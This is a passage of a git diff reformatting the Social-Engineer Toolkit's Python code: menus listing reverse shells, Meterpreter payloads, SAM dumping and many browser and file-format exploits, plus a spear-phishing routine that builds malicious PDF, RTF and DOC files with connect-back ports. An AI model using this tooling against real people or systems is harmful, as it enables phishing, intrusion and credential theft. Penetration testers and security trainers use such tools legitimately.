|
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
|
||||||
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
|
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
|
||||||
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
|
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
|
||||||
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
|
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
|
||||||
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
|
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
|
||||||
'Import your own executable Specify a path for your own executable\n']
|
'Import your own executable Specify a path for your own executable\n']
|
||||||
|
|
||||||
if operating_system == "windows" or msf_path == False:
|
if operating_system == "windows" or msf_path == False:
|
||||||
payload_menu_1 = [
|
payload_menu_1 = [
|
||||||
|
@ -264,17 +264,17 @@ What payload do you want to generate:
|
||||||
# used in gen_payload.py
|
# used in gen_payload.py
|
||||||
|
|
||||||
payload_menu_2 = [
|
payload_menu_2 = [
|
||||||
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
|
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
|
||||||
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
|
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
|
||||||
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
|
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
|
||||||
#'Windows Bind Shell Execute payload and create an accepting port on remote system.',
|
#'Windows Bind Shell Execute payload and create an accepting port on remote system.',
|
||||||
#'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
|
#'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
|
||||||
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
|
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
|
||||||
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
|
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
|
||||||
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
|
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
|
||||||
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
|
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
|
||||||
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
|
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
|
||||||
'Download/Run your Own Executable Downloads an executable and runs it\n'
|
'Download/Run your Own Executable Downloads an executable and runs it\n'
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@ -282,37 +282,37 @@ payload_menu_2_text = """\n"""
|
||||||
|
|
||||||
payload_menu_3_text = ""
|
payload_menu_3_text = ""
|
||||||
payload_menu_3 = [
|
payload_menu_3 = [
|
||||||
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
|
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
|
||||||
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
|
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
|
||||||
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
|
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
|
||||||
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
|
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
|
||||||
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
|
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
|
||||||
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
|
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
|
||||||
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
|
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
|
||||||
|
|
||||||
# called from create_payload.py associated dictionary = ms_attacks
|
# called from create_payload.py associated dictionary = ms_attacks
|
||||||
create_payloads_menu = [
|
create_payloads_menu = [
|
||||||
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
|
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
|
||||||
'SET Custom Written Document UNC LM SMB Capture Attack',
|
'SET Custom Written Document UNC LM SMB Capture Attack',
|
||||||
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
|
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
|
||||||
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
|
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
|
||||||
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
|
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
|
||||||
'Adobe Flash Player "Button" Remote Code Execution',
|
'Adobe Flash Player "Button" Remote Code Execution',
|
||||||
'Adobe CoolType SING Table "uniqueName" Overflow',
|
'Adobe CoolType SING Table "uniqueName" Overflow',
|
||||||
'Adobe Flash Player "newfunction" Invalid Pointer Use',
|
'Adobe Flash Player "newfunction" Invalid Pointer Use',
|
||||||
'Adobe Collab.collectEmailInfo Buffer Overflow',
|
'Adobe Collab.collectEmailInfo Buffer Overflow',
|
||||||
'Adobe Collab.getIcon Buffer Overflow',
|
'Adobe Collab.getIcon Buffer Overflow',
|
||||||
'Adobe JBIG2Decode Memory Corruption Exploit',
|
'Adobe JBIG2Decode Memory Corruption Exploit',
|
||||||
'Adobe PDF Embedded EXE Social Engineering',
|
'Adobe PDF Embedded EXE Social Engineering',
|
||||||
'Adobe util.printf() Buffer Overflow',
|
'Adobe util.printf() Buffer Overflow',
|
||||||
'Custom EXE to VBA (sent via RAR) (RAR required)',
|
'Custom EXE to VBA (sent via RAR) (RAR required)',
|
||||||
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
|
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
|
||||||
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
|
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
|
||||||
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
|
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
|
||||||
'Apple QuickTime PICT PnSize Buffer Overflow',
|
'Apple QuickTime PICT PnSize Buffer Overflow',
|
||||||
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
|
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
|
||||||
'Adobe Reader u3D Memory Corruption Vulnerability',
|
'Adobe Reader u3D Memory Corruption Vulnerability',
|
||||||
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
|
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
|
||||||
|
|
||||||
create_payloads_text = """
|
create_payloads_text = """
|
||||||
Select the file format exploit you want.
|
Select the file format exploit you want.
|
||||||
|
@ -320,52 +320,52 @@ create_payloads_text = """
|
||||||
********** PAYLOADS **********\n"""
|
********** PAYLOADS **********\n"""
|
||||||
|
|
||||||
browser_exploits_menu = [
|
browser_exploits_menu = [
|
||||||
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
|
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
|
||||||
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
|
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
|
||||||
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
|
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
|
||||||
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
|
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
|
||||||
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
|
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
|
||||||
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
|
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
|
||||||
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
|
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
|
||||||
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
|
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
|
||||||
'Java Applet JMX Remote Code Execution (2013-01-10)',
|
'Java Applet JMX Remote Code Execution (2013-01-10)',
|
||||||
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
|
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
|
||||||
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
|
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
|
||||||
'Java 7 Applet Remote Code Execution (2012-08-26)',
|
'Java 7 Applet Remote Code Execution (2012-08-26)',
|
||||||
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
|
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
|
||||||
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
|
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
|
||||||
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
|
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
|
||||||
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
|
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
|
||||||
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
|
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
|
||||||
'Adobe Flash Player Object Type Confusion (2012-05-04)',
|
'Adobe Flash Player Object Type Confusion (2012-05-04)',
|
||||||
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
|
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
|
||||||
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
|
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
|
||||||
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
|
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
|
||||||
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
|
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
|
||||||
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
|
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
|
||||||
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
|
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
|
||||||
'Internet Explorer CSS Import Use After Free (2010-11-29)',
|
'Internet Explorer CSS Import Use After Free (2010-11-29)',
|
||||||
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
|
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
|
||||||
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
|
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
|
||||||
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
|
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
|
||||||
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
|
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
|
||||||
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
|
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
|
||||||
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
|
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
|
||||||
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
|
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
|
||||||
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
|
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
|
||||||
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
|
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
|
||||||
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
|
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
|
||||||
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
|
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
|
||||||
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
|
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
|
||||||
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
|
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
|
||||||
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
|
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
|
||||||
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
|
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
|
||||||
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
|
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
|
||||||
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
|
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
|
||||||
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
|
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
|
||||||
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
|
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
|
||||||
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
|
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
|
||||||
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
|
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
|
||||||
|
|
||||||
browser_exploits_text = """
|
browser_exploits_text = """
|
||||||
Enter the browser exploit you would like to use [8]:
|
Enter the browser exploit you would like to use [8]:
|
||||||
|
@ -373,10 +373,10 @@ browser_exploits_text = """
|
||||||
|
|
||||||
# this is for the powershell attack vectors
|
# this is for the powershell attack vectors
|
||||||
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
|
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
|
||||||
'Powershell Reverse Shell',
|
'Powershell Reverse Shell',
|
||||||
'Powershell Bind Shell',
|
'Powershell Bind Shell',
|
||||||
'Powershell Dump SAM Database',
|
'Powershell Dump SAM Database',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
powershell_text = ("""
|
powershell_text = ("""
|
||||||
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")
|
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
## module_handler.py
|
# module_handler.py
|
||||||
|
|
||||||
import glob
|
import glob
|
||||||
import re
|
import re
|
||||||
|
@ -14,9 +14,10 @@ menu_return = "false"
|
||||||
counter = 0
|
counter = 0
|
||||||
|
|
||||||
# get the menu going
|
# get the menu going
|
||||||
print "\n"
|
print("\n")
|
||||||
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
|
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
|
||||||
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
|
print_info_spaces(
|
||||||
|
"Please read the readme/modules.txt for information on how to create your own modules.\n")
|
||||||
|
|
||||||
for name in glob.glob("modules/*.py"):
|
for name in glob.glob("modules/*.py"):
|
||||||
|
|
||||||
|
@ -30,9 +31,9 @@ for name in glob.glob("modules/*.py"):
|
||||||
line = line.replace('MAIN="', "")
|
line = line.replace('MAIN="', "")
|
||||||
line = line.replace('"', "")
|
line = line.replace('"', "")
|
||||||
line = " " + str(counter) + ". " + line
|
line = " " + str(counter) + ". " + line
|
||||||
print line
|
print(line)
|
||||||
|
|
||||||
print "\n 99. Return to the previous menu\n"
|
print("\n 99. Return to the previous menu\n")
|
||||||
choice = raw_input(setprompt(["9"], ""))
|
choice = raw_input(setprompt(["9"], ""))
|
||||||
|
|
||||||
if choice == 'exit':
|
if choice == 'exit':
|
||||||
|
@ -55,7 +56,7 @@ if menu_return == "false":
|
||||||
# pull any files in the modules directory that starts with .py
|
# pull any files in the modules directory that starts with .py
|
||||||
for name in glob.glob("modules/*.py"):
|
for name in glob.glob("modules/*.py"):
|
||||||
|
|
||||||
counter = counter+1
|
counter = counter + 1
|
||||||
|
|
||||||
if counter == int(choice):
|
if counter == int(choice):
|
||||||
# get rid of .modules extension
|
# get rid of .modules extension
|
||||||
|
@ -76,6 +77,6 @@ if menu_return == "false":
|
||||||
try:
|
try:
|
||||||
exec("%s.main()" % (name))
|
exec("%s.main()" % (name))
|
||||||
# handle the exception if main isn't there
|
# handle the exception if main isn't there
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
raw_input(" [!] There was an issue with a module: %s." % (e))
|
raw_input(" [!] There was an issue with a module: %s." % (e))
|
||||||
return_continue()
|
return_continue()
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
## PDF spear phishing attack here
|
# PDF spear phishing attack here
|
||||||
|
|
||||||
import subprocess
|
import subprocess
|
||||||
import re
|
import re
|
||||||
|
@ -13,50 +13,52 @@ from src.core.dictionaries import *
|
||||||
from src.core.menu.text import *
|
from src.core.menu.text import *
|
||||||
|
|
||||||
me = mod_name()
|
me = mod_name()
|
||||||
definepath=os.getcwd()
|
definepath = os.getcwd()
|
||||||
define_version = get_version()
|
define_version = get_version()
|
||||||
users_home = os.getenv("HOME")
|
users_home = os.getenv("HOME")
|
||||||
|
|
||||||
# metasploit path
|
# metasploit path
|
||||||
meta_path=meta_path()
|
meta_path = meta_path()
|
||||||
|
|
||||||
print meta_path
|
print(meta_path)
|
||||||
|
|
||||||
# define if we need apache or not for dll hijacking
|
# define if we need apache or not for dll hijacking
|
||||||
# define if use apache or not
|
# define if use apache or not
|
||||||
apache=0
|
apache = 0
|
||||||
|
|
||||||
# open set_config
|
# open set_config
|
||||||
apache_check=file("/etc/setoolkit/set.config","r").readlines()
|
apache_check = file("/etc/setoolkit/set.config", "r").readlines()
|
||||||
|
|
||||||
# loop this guy to search for the APACHE_SERVER config variable
|
# loop this guy to search for the APACHE_SERVER config variable
|
||||||
for line in apache_check:
|
for line in apache_check:
|
||||||
# strip \r\n
|
# strip \r\n
|
||||||
line=line.rstrip()
|
line = line.rstrip()
|
||||||
# if apache is turned on get things ready
|
# if apache is turned on get things ready
|
||||||
match=re.search("APACHE_SERVER=ON",line)
|
match = re.search("APACHE_SERVER=ON", line)
|
||||||
# if its on lets get apache ready
|
# if its on lets get apache ready
|
||||||
if match:
|
if match:
|
||||||
for line2 in apache_check:
|
for line2 in apache_check:
|
||||||
# set the apache path here
|
# set the apache path here
|
||||||
match2=re.search("APACHE_DIRECTORY=", line2)
|
match2 = re.search("APACHE_DIRECTORY=", line2)
|
||||||
if match2:
|
if match2:
|
||||||
line2=line2.rstrip()
|
line2 = line2.rstrip()
|
||||||
apache_path=line2.replace("APACHE_DIRECTORY=","")
|
apache_path = line2.replace("APACHE_DIRECTORY=", "")
|
||||||
apache=1
|
apache = 1
|
||||||
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
|
if os.path.isdir(apache_path + "/html"):
|
||||||
|
apache_path = apache_path + "/html"
|
||||||
|
|
||||||
###################################################
|
###################################################
|
||||||
# USER INPUT: SHOW PAYLOAD MENU #
|
# USER INPUT: SHOW PAYLOAD MENU #
|
||||||
###################################################
|
###################################################
|
||||||
inputpdf=""
|
inputpdf = ""
|
||||||
target=""
|
target = ""
|
||||||
exploit = "INVALID"
|
exploit = "INVALID"
|
||||||
while exploit == "INVALID":
|
while exploit == "INVALID":
|
||||||
debug_msg(me,"printing 'src.core.menu.text.create_payloads_menu'",5)
|
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
|
||||||
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu)
|
show_payload_menu1 = create_menu(
|
||||||
|
create_payloads_text, create_payloads_menu)
|
||||||
exploit = raw_input(setprompt(["4"], ""))
|
exploit = raw_input(setprompt(["4"], ""))
|
||||||
print "\n"
|
print("\n")
|
||||||
|
|
||||||
# Do conditional checks for the value of 'exploit', which should be a number
|
# Do conditional checks for the value of 'exploit', which should be a number
|
||||||
# Handle any additional tasks before doing the dictionary lookup and
|
# Handle any additional tasks before doing the dictionary lookup and
|
||||||
|
@ -67,37 +69,40 @@ while exploit == "INVALID":
|
||||||
exit_set()
|
exit_set()
|
||||||
|
|
||||||
if exploit == "":
|
if exploit == "":
|
||||||
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
|
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
|
||||||
|
exploit = '1'
|
||||||
|
|
||||||
if exploit == '3': #'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
|
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
|
||||||
outfile=("template.doc")
|
outfile = ("template.doc")
|
||||||
|
|
||||||
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
|
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
|
||||||
outfile=("template.rtf")
|
if exploit == '4':
|
||||||
target=("TARGET=1")
|
outfile = ("template.rtf")
|
||||||
|
target = ("TARGET=1")
|
||||||
|
|
||||||
if exploit == "5":
|
if exploit == "5":
|
||||||
outfile = ("template.mov")
|
outfile = ("template.mov")
|
||||||
|
|
||||||
if exploit != '3' and exploit != '4' and exploit !="17":
|
if exploit != '3' and exploit != '4' and exploit != "17":
|
||||||
outfile=("template.pdf")
|
outfile = ("template.pdf")
|
||||||
|
|
||||||
|
debug_msg(me, 'current input was read as: %s' % exploit, 3)
|
||||||
debug_msg(me,'current input was read as: %s' % exploit,3)
|
exploit = ms_attacks(exploit)
|
||||||
exploit=ms_attacks(exploit)
|
debug_msg(me, 'value was translated to: %s' % exploit, 3)
|
||||||
debug_msg(me,'value was translated to: %s' % exploit,3)
|
|
||||||
|
|
||||||
if exploit == "INVALID":
|
if exploit == "INVALID":
|
||||||
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.")
|
print_warning(
|
||||||
|
"that choice is invalid...please try again or press ctrl-c to Cancel.")
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
|
|
||||||
# 'exploit' has been converted to the string by now, so we need to
|
# 'exploit' has been converted to the string by now, so we need to
|
||||||
# evaluate the string instead of the user input number from here on...
|
# evaluate the string instead of the user input number from here on...
|
||||||
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
|
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
|
||||||
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
|
print_info(
|
||||||
print """
|
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
|
||||||
|
print("""
|
||||||
1. Use your own PDF for attack
|
1. Use your own PDF for attack
|
||||||
2. Use built-in BLANK PDF for attack\n"""
|
2. Use built-in BLANK PDF for attack\n""")
|
||||||
|
|
||||||
choicepdf = raw_input(setprompt(["4"], ""))
|
choicepdf = raw_input(setprompt(["4"], ""))
|
||||||
|
|
||||||
|
@ -106,92 +111,97 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
|
||||||
|
|
||||||
if choicepdf == '1':
|
if choicepdf == '1':
|
||||||
# define if user wants to use their own pdf or built in one
|
# define if user wants to use their own pdf or built in one
|
||||||
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
|
inputpdf = raw_input(
|
||||||
|
setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
|
||||||
# if blank, then default to normal pdf
|
# if blank, then default to normal pdf
|
||||||
if inputpdf == "":
|
if inputpdf == "":
|
||||||
# change to default SET pdf
|
# change to default SET pdf
|
||||||
print_info("Defaulting to BLANK PDF built into SET...")
|
print_info("Defaulting to BLANK PDF built into SET...")
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
# if no file exists defalt this
|
# if no file exists defalt this
|
||||||
if not os.path.isfile(inputpdf):
|
if not os.path.isfile(inputpdf):
|
||||||
print_warning("Unable to find PDF, defaulting to blank PDF.")
|
print_warning("Unable to find PDF, defaulting to blank PDF.")
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
|
|
||||||
if choicepdf == '2':
|
if choicepdf == '2':
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
|
|
||||||
if choicepdf == "":
|
if choicepdf == "":
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
|
|
||||||
exploit_counter=0
|
exploit_counter = 0
|
||||||
|
|
||||||
if exploit == "dll_hijacking" or exploit == "unc_embed":
|
if exploit == "dll_hijacking" or exploit == "unc_embed":
|
||||||
exploit_counter=1
|
exploit_counter = 1
|
||||||
|
|
||||||
if exploit_counter == 0:
|
if exploit_counter == 0:
|
||||||
|
|
||||||
###################################################
|
###################################################
|
||||||
# USER INPUT: SHOW PAYLOAD MENU 3 #
|
# USER INPUT: SHOW PAYLOAD MENU 3 #
|
||||||
###################################################
|
###################################################
|
||||||
debug_msg(me,"printing 'src.core.menu.text.payload_menu_3'",5)
|
debug_msg(me, "printing 'src.core.menu.text.payload_menu_3'", 5)
|
||||||
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
|
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
|
||||||
payload=raw_input(setprompt(["4"], ""))
|
payload = raw_input(setprompt(["4"], ""))
|
||||||
noencode=0
|
noencode = 0
|
||||||
|
|
||||||
if payload == 'exit':
|
if payload == 'exit':
|
||||||
exit_set()
|
exit_set()
|
||||||
|
|
||||||
if payload == "" : payload="2"
|
if payload == "":
|
||||||
|
payload = "2"
|
||||||
if payload == '4' or payload == '5' or payload == '6':
|
if payload == '4' or payload == '5' or payload == '6':
|
||||||
noencode=1
|
noencode = 1
|
||||||
|
|
||||||
payload=ms_payload_3(payload)
|
|
||||||
|
|
||||||
|
payload = ms_payload_3(payload)
|
||||||
|
|
||||||
# imported from central, grabs ip address
|
# imported from central, grabs ip address
|
||||||
rhost=grab_ipaddress()
|
rhost = grab_ipaddress()
|
||||||
|
|
||||||
# SET LPORT
|
# SET LPORT
|
||||||
lport=raw_input(setprompt(["4"], "Port to connect back on [443]"))
|
lport = raw_input(setprompt(["4"], "Port to connect back on [443]"))
|
||||||
|
|
||||||
# if blank default to 443
|
# if blank default to 443
|
||||||
if lport == "":
|
if lport == "":
|
||||||
lport="443"
|
lport = "443"
|
||||||
print_info("Defaulting to port 443...")
|
print_info("Defaulting to port 443...")
|
||||||
|
|
||||||
# SET FILE OUTPATH
|
# SET FILE OUTPATH
|
||||||
# /root/.msf4/local/msf.pdf
|
# /root/.msf4/local/msf.pdf
|
||||||
filename_code = outfile
|
filename_code = outfile
|
||||||
if os.path.isdir(users_home + "/.msf4/"):
|
if os.path.isdir(users_home + "/.msf4/"):
|
||||||
msfpath = (users_home + "/.msf4/")
|
msfpath = (users_home + "/.msf4/")
|
||||||
|
|
||||||
if os.path.isdir(users_home + "/.msf5/"):
|
if os.path.isdir(users_home + "/.msf5/"):
|
||||||
